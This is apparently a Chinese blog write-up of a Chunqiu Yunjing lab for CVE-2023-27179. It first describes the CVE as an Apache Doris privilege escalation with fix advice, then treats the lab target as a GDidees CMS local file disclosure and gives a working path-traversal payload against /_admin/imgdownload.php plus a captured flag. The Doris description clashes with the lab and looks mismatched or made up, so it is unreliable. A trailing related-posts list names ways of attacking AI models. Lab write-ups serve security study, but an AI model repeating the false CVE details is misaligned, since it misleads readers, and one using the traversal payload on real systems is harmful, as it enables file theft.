【春秋云镜】CVE-2023-27179

CVE-2023-27179

CVE-2023-27179 是一个影响 Apache Doris 的漏洞。Apache Doris 是一款用于交互式分析的高性能数据库,特别适用于处理大规模的结构化数据。该漏洞属于权限提升漏洞,允许未授权用户以管理员身份执行敏感操作。

具体细节

  • 漏洞类型:权限提升漏洞(Privilege Escalation)
  • 影响范围:Apache Doris 1.2.0 及之前版本
  • 成因:该漏洞的出现是由于权限检查不严格,导致未授权用户可以通过特定接口执行管理员操作。
  • 攻击方式:攻击者可以利用此漏洞绕过权限控制,从而执行管理员才能进行的敏感操作,例如修改配置、管理用户等。

影响

成功利用该漏洞的攻击者可以获得更高权限,导致数据库中的敏感数据被泄露、篡改或破坏,进一步威胁系统的安全。

修复建议

  • 官方在 Apache Doris 的更新中修复了此漏洞,建议:

  • 升级 Apache Doris:更新到最新版,确保版本在 1.2.0 以上。

  • 访问控制:限制数据库的访问权限,仅允许可信任的用户和 IP 地址访问数据库。

  • 监控异常活动:设置日志监控,及时发现权限异常或可疑操作。

靶标介绍:

GDidees CMS v3.9.1及更低版本被发现存在本地文件泄露漏洞,漏洞通过位于 /_admin/imgdownload.php 的 filename 参数进行利用。

解法一:

  1. 用目录扫描工具进行扫描

    出现目标路径

  2. payload

html 复制代码
/_admin/imgdownload.php?filename=../../../../../flag
复制代码
flag{82565a92-d64c-49c5-87c0-42129440c1aa}
相关推荐
HackTwoHub4 小时前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
Eastmount4 小时前
[论文阅读] (51)ESWA25 基于启发式优化器的入侵检测系统
论文阅读·网络安全·sci·入侵检测·eswa
白帽小阳5 小时前
Typora插件开发指南:打造专属IDE式写作环境
c语言·网络·python·网络安全·github·pygame·护网行动
Sagittarius_A*5 小时前
Web 渗透信息收集实战:站点指纹识别与目录扫描
网络安全·渗透测试·kali
m0_738120721 天前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
其实防守也摸鱼2 天前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
菩提小狗2 天前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全
数据知道2 天前
DNS 安全攻防:缓存投毒、DNS 隧道与检测实战
安全·网络安全·缓存·缓存投毒
其实防守也摸鱼3 天前
蓝队相关知识学习(1)---常用堡垒机和服务器
服务器·功能测试·学习·网络安全·网络攻击模型·攻防对抗·蓝队
学逆向的3 天前
汇编——数据存储模式
开发语言·汇编·网络安全